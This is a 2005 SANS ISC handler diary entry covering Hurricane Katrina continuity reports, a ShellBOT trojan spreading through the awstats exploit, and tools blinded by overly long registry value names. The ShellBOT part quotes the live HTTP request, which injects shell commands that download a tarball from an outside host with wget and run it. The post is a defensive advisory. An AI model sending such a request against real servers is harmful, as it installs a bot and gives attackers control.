Threat Level: green Handler on Duty: Basil Alawi S.Taher

SANS ISC: InfoSec Handlers Diary Blog - Hurricane Katrina; ShellBOT/awstats; Long Registry Value Names InfoSec Handlers Diary Blog


Sign Up for Free!   Forgot Password?
Log In or Sign Up for Free!

Hurricane Katrina; ShellBOT/awstats; Long Registry Value Names

Published: 2005-08-29
Last Updated: 2005-09-13 13:31:48 UTC
by Erik Fichtner (Version: 1)
0 comment(s)

Hurricane Katrina

Our sympathies for those affected by Katrina. By all measures, this has been
an incredibly expensive storm, and it's not over yet. We're particularly
interested in reports of disaster preparedness and business continuity
actions that were taken, especially the ones that worked! Otherwise, stay
safe and stay dry.

Understandably, there haven't been very many reports of any kind out of the
area yet, but we have heard that there was an Internet2 link that went down
between Houston and Atlanta, which is being worked around.

http://loadrunner.uits.iu.edu/weathermaps/abilene/

Reader Wes Oden from Jackson, MS wrote in to let us know that he'd been up
until 5am preparing their office for the storm, and decided to turn the event into
an exercise in remote monitoring after the Governor issued a state of emergency
and requested that all residents stay off the roads. "We took non-critical servers
down to conserve battery power, and now all we can do is sit and wait for the
worst to come and hope the power stays up." We hope so, too.

New ShellBOT spreading via awstats.

We've gotten reports of a new variant of the ShellBOT trojan being spread
via the well known awstats exploit. The hostile HTTP request is:

GET /cgi-bin/awstats.pl?configdir=|echo%20;cd%20/tmp;mkdir%20.a;
cd%20.a;wget%20http://fbi.php5.sk/qmail.tgz;tar%20-xzvf%20qmail.tgz;
cd%20qmail;./start;echo%20;echo| HTTP/1.1

This version brings an irc server and and irc client along for the ride to
implement some command and control channels, as well as an ELF file
infector (Linux.RST.b). We're interested in captures of this command and
control traffic.

More on the overly long registry value name hiding problem:

An article over at PC-Welt (in german; use babelfish if necessary) about which
products successfully handle long registry value names and which ones are partially
blinded by them leads us at the ISC to wonder if different language versions of
Windows 2000 and XP handle long registry value names differently. That could
explain some of the difficulty that various testers have had in validating which
tools work and which platforms are affected.

http://www.pcwelt.de/news/sicherheit/118750/index.html
Keywords:
0 comment(s)
Diary Archives